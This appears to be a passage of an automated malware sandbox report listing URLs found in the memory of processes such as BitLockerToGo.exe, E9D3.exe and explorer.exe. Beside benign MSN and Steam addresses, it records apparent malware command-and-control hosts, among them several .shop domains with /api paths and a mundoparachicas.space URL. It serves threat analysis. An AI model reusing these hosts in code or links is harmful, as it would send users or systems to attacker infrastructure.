Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028685722.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3027507828.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/?
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/O
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/W
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028685722.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3027507828.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/api0
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/api9
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bassizcellskz.shop/g
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://celebratioopz.shop/
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://celebratioopz.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://celebratioopz.shop/api=
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=oLfIUw8O
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=p7UJOiUOt47z&l=e
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://complaintsipzzx.shop/
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://complaintsipzzx.shop/V
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://complaintsipzzx.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://complaintsipzzx.shop/x
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deallerospfosu.shop/
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deallerospfosu.shop/C
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deallerospfosu.shop/W
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deallerospfosu.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deallerospfosu.shop:443/api
Source: explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: 46F6.exe.1.dr	String found in binary or memory: https://github.com/zloirock/core-js
Source: 46F6.exe.1.dr	String found in binary or memory: https://github.com/zloirock/core-js/blob/v3.20.3/LICENSE
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://languagedscie.shop/
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://languagedscie.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://languagedscie.shop/apip
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://languagedscie.shop:443/apier-EncodingTrailerno-cachePragmaKeep-AliveMon
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mennyudosirso.shop/
Source: BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mennyudosirso.shop/api
Source: E9D3.exe, 00000006.00000002.2647667163.00000255F93BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mundoparachicas.space/
Source: E9D3.exe, 00000006.00000002.2648044478.00000255F957A000.00000004.00001000.00020000.00000000.sdmp, E9D3.exe, 00000006.00000003.2633539999.00000255F93D1000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000003.2632827584.00000255F93F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LO
Source: E9D3.exe, 00000006.00000003.2632827584.00000255F93F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mundoparachicas.space:443/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12
Source: explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: 46F6.exe, 00000008.00000002.2910551461.000000C0001D4000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000000.2678059924.00007FF7CD7CB000.00000008.00000001.01000000.00000007.sdmp, 46F6.exe, 00000008.00000002.2931930528.00007FF7CD7D2000.00000008.00000001.01000000.00000007.sdmp, 46F6.exe.1.dr	String found in binary or memory: https://petstore.swagger.io/v2/swagger.json
Source: explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quialitsuzoxm.shop/api
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
